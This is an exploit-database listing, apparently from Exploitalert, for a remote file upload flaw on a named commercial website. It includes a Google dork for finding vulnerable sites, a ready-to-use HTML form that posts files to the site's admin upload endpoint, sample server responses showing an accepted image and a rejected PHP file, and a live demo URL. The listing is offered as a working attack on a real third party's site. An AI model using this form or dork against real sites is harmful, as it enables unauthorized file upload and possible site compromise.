Advertisement
CVE | Category | Price | Severity |
---|---|---|---|
CVE-XXXX-XXXX | CWE-XX | Unknown | High |
Author | Risk | Exploitation Type | Date |
---|---|---|---|
Unknown | High | Remote | 2018-06-11 |
CVSS | EPSS | EPSSP |
---|---|---|
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H | 0.08746 | 0.78388 |
# Exploit Title: Makeupbarr Remote File Upload Vulnerability # Google Dork: intext:Copyright Makeupbarr.Com # Exploit Author: Mr.T959 # Author Website : http://mr-t959.xyz # Tested on: Windows 7 -------------------------------------- # Exploit HTML Code : <form method='post' target='_blank' action='https://www.makeupbarr.com/Admin/server/php/' enctype='multipart/form-data'> <input type='file' name='files[]'><input type='submit' name='g' value='Upload Cok!'></form> # Exploit Admin/server/php/ # Successful {"files":[{"name":"ecc4cebd847cd68e07746262fd8d2ec2.jpeg","size":5362,"type":"image\/jpeg","url":"https:\/\/www.makeupbarr.com\/Admin\/server\/php\/files\/ecc4cebd847cd68e07746262fd8d2ec2.jpeg" # Error {"files":[{"name":"geo.php","size":3468,"type":"application\/octet-stream","error":"Filetype not allowed"}]} # Demo https://www.makeupbarr.com/Admin/server/php/
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.